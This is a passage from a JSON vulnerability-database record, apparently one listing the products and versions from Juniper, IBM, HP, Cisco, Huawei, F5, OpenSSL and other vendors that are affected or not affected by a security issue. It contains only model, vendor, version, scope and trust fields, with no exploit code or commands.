12.1r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "worklight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "junos 12.2r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "sa2000 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.51" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.33" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "junos 12.3r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos 12.1x44-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "junos os 12.1x46-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "system x3500m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73801.42" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.3.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "junos 13.2x51-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.1x44-d20.3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.5" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73231.42" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "junose", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "junos 12.1r7-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "junos 12.1r5-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "system x3200m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73271.42" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.5" }, { "model": "junos 12.2x50-d70", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "junos 12.1x46-d20.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "junos 13.2x50-d15.3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "sa2500 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos r11", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "junos 13.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.4-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "junos", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos 13.2x51-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "security zsecure visual", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x44-d32", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v19.7" }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "system x3200m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73281.42" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "junos r4-s2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "junos r1", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "junos 12.1x44-d34", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.1x49-d55", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571451.43" }, { "model": "junos d20", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netcool/system service monitor fp1 p14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0-" }, { "model": "junos 12.2r1.3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v310.1" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "9.2-release-p4", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.29" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos os 11.4r12-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": 